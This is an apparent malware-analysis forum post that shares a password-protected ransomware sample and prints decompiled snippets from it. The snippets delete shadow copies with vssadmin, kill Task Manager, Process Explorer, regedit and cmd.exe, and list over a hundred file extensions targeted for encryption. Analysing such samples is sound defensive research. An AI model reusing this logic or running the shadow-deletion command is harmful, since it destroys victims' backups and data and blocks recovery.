Hello,
and some more of this bad stuff.
and some more of this bad stuff.
Attachments
pass: infected
(112.79 KiB) Downloaded 483 times
(112.79 KiB) Downloaded 483 times
A forum for reverse engineering, OS internals and malware analysis
pExecInfo.lpVerb = L"open";
if ( !dword_4681A8 )
pExecInfo.lpVerb = L"runas";
pExecInfo.lpFile = L"vssadmin.exe";
pExecInfo.lpParameters = L"delete shadows /all /Quiet";
pExecInfo.nShow = 0;
pExecInfo.fMask = 64;
while ( !ShellExecuteExW(&pExecInfo)
if ( wcsstr(&ImageFileName, L"taskmgr")
|| wcsstr(&ImageFileName, L"procexp")
|| wcsstr(&ImageFileName, L"regedit")
|| wcsstr(&ImageFileName, L"msconfig")
|| wcsstr(&ImageFileName, L"cmd.exe") )
TerminateProcess(v4, 0);
.sql
.rar
.wma
.avi
.wmv
.csv
.d3dbsp
.zip
.sie
.sum
.ibank
.qdf
.gdb
.tax
.pkpass
.bkp
.qic
.bkf
.sidn
.sidd
.mddata
.itl
.itdb
.icxs
.hvpl
.hplg
.hkdb
.mdbackup
.syncdb
.gho
.cas
.svg
.map
.wmo
.itm
.fos
.mov
.vdf
.ztmp
.sis
.sid
.ncf
.menu
.layout
.dmp
.blob
.esm
.vcf
.vtf
.dazip
.fpk
.mlx
.iwd
.vpk
.tor
.psk
.rim
.fsh
.ntl
.arch00
.lvl
.snx
.cfr
.vpp_pc
.lrf
.mcmeta
.vfs0
.mpqge
.kdb
.dba
.rofl
.hkx
.bar
.upk
.das
.iwi
.litemod
.asset
.forge
.ltx
.bsa
.apk
.sav
.lbf
.slm
.bik
.epk
.rgss3a
.pak
.big
wallet
.wotreplay
.xxx
.desc
.flv
.css
.png
.jpeg
.txt
.pfx
.pem
.crt
.cer
.der
.srw
.pef
.ptx
.rwl
.raw
.raf
.orf
.nrw
.mrwref
.mef
.erf
.kdc
.dcr
.crw
.bay
.srf
.arw
.dng
.jpe
.jpg
.cdr
.indd
.eps
.pdf
.pdd
.psd
.dbf
.mdf
.rtf
.wpd
.dxg
.dwg
.pst
.accdb
.mdb
.pptm
.pptx
.ppt
.xlk
.xlsb
.xlsm
.xlsx
.xls
.wps
.docm
.docx
.doc
.odb
.odc
.odm
.odp
.ods
.odt